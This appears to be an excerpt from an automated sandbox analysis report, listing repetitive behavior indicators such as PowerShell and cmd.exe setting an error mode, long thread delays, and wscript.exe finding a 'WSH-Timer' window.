Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3396Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6356Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1457Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 840Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5407
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4342
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1539
